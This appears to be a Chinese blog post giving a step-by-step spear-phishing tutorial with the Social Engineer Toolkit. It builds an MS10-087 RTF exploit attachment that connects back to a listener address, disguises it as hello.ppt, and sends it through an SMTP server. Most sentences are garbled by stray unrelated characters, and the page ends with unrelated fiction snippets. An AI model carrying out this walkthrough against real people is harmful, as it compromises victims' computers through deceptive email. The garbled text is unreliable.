社會工程實(shí)戰(zhàn)-魚叉式釣魚攻擊

0x00 魚叉式釣魚攻擊

攻擊者通過發(fā)送帶有攻擊性的郵件給受害者,一旦受害者打開攻擊郵件坑鱼,點(diǎn)開攻擊郵件中的附件等枷遂,就會給受害者的電腦造成一定的影響。

0x01 釣魚攻擊步驟

【Step1】

root@kali:~# setoolkit 啟動SET終端
kali linux啟動SET終端创译,出現(xiàn)下圖。

【Step2】

set>1 選擇1墙基,社會工程學(xué)攻擊

【Step3】

set>1 選擇1软族,魚叉式釣魚攻擊


從上圖中可以看出,魚叉式釣魚攻擊有3種:

  1. 群發(fā)郵件残制;
  2. 創(chuàng)建1個(gè)文件的附件立砸;
  3. 創(chuàng)建1個(gè)社會工程學(xué)模板。

【Step4】

set:phishing>2 選擇2初茶,即創(chuàng)建1個(gè)文件的附件


上圖中有20多種通過附件形式進(jìn)行攻擊的方式颗祝,利用操作系統(tǒng)和軟件的漏洞進(jìn)行攻擊,也就是說在特定的版本或系統(tǒng)上才出現(xiàn),因此要注意被測試的系統(tǒng)和軟件版本螺戳。

【Step5】

set:payload>6 選擇6搁宾, 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)。payload選擇為MS10-087

【Step6】

set:payload>4 選擇4倔幼,并輸入本地監(jiān)聽地址10.121.10.170

【Step7】

set:phishing>2 選擇2盖腿,重命名文件為hello.ppt

【Step8】

set:phishing>1 選擇“1”,發(fā)送單份郵件
然后
set:phishing>2 選擇“2”损同,使用郵件發(fā)送模板
先輸入email郵件主題奸忽,然后選擇是以頁面形式發(fā)送還是文本形式發(fā)送,此處選擇p揖庄,即文本形式發(fā)送栗菜。然后輸入一些郵件內(nèi)容,輸入完畢后按“Ctrl+C”蹄梢。最后輸入發(fā)送郵件的郵箱地址疙筹。如下圖所示。

【Step9】

set:phishing>2 選擇“2”禁炒,use your own server or open relay而咆,使用自定義郵箱服務(wù)器
輸入發(fā)送郵件的郵箱地址:nijunwei@dp.com
輸入發(fā)送郵件的郵箱可見名:nijunwei
輸入發(fā)送郵件的郵箱名:nijunwei@dp.com
輸入發(fā)送郵件的郵箱密碼:-------
輸入發(fā)送郵箱的SMTP服務(wù)器地址:192.168.2.254
輸入SMTP服務(wù)器的端口:25
是否設(shè)定郵件為高優(yōu)先級:yes
是否設(shè)置監(jiān)聽:yes

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市幕袱,隨后出現(xiàn)的幾起案子暴备,更是在濱河造成了極大的恐慌,老刑警劉巖们豌,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件涯捻,死亡現(xiàn)場離奇詭異,居然都是意外死亡望迎,警方通過查閱死者的電腦和手機(jī)障癌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來辩尊,“玉大人涛浙,你說我怎么就攤上這事∩阌” “怎么了轿亮?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵,是天一觀的道長胸墙。 經(jīng)常有香客問我我注,道長,這世上最難降的妖魔是什么劳秋? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任仓手,我火速辦了婚禮胖齐,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘嗽冒。我一直安慰自己呀伙,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布添坊。 她就那樣靜靜地躺著剿另,像睡著了一般。 火紅的嫁衣襯著肌膚如雪贬蛙。 梳的紋絲不亂的頭發(fā)上雨女,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天,我揣著相機(jī)與錄音阳准,去河邊找鬼氛堕。 笑死,一個(gè)胖子當(dāng)著我的面吹牛野蝇,可吹牛的內(nèi)容都是我干的讼稚。 我是一名探鬼主播,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼绕沈,長吁一口氣:“原來是場噩夢啊……” “哼锐想!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起乍狐,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤赠摇,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后浅蚪,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體藕帜,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年掘鄙,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了耘戚。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片嗡髓。...
    茶點(diǎn)故事閱讀 40,675評論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡操漠,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出饿这,到底是詐尸還是另有隱情浊伙,我是刑警寧澤,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布长捧,位于F島的核電站嚣鄙,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏串结。R本人自食惡果不足惜哑子,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一舅列、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧卧蜓,春花似錦帐要、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至盛霎,卻和暖如春赠橙,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背愤炸。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工期揪, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人规个。 一個(gè)月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓横侦,卻偏偏與公主長得像,于是被迫代替她去往敵國和親绰姻。 傳聞我的和親對象是個(gè)殘疾皇子枉侧,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容